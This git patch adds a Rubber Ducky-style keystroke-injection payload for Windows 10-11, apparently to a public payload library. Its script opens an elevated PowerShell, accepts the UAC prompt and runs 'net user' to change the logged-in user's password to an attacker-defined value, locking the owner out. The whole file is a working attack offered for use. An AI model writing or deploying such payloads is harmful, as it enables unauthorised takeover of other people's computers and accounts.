From d51b734de281fb5ca3e799221760ec365d86fd68 Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 8 Jun 2023 08:55:02 +0200 Subject: [PATCH] Change the password of the windows user --- .../payload.txt | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt diff --git a/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt b/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt new file mode 100644 index 0000000..4b1bab6 --- /dev/null +++ b/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt @@ -0,0 +1,32 @@ +REM ############################################################ +REM # | +REM # Title : Change the password of the Windows user | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Execute | +REM # Target : Windows 10-11 | +REM # | +REM ############################################################ + +REM Requirements: +REM - Nothing (i know it's absurd) + +REM You must define the new Windows user password +DEFINE NEW_PASSWORD example + +DELAY 1000 +GUI x +DELAY 500 +STRING a +DELAY 500 +LEFT_ARROW +DELAY 500 +ENTER + +DELAY 2000 +STRING net user $env:USERNAME +STRING NEW_PASSWORD +ENTER +DELAY 1000 + +ALT F4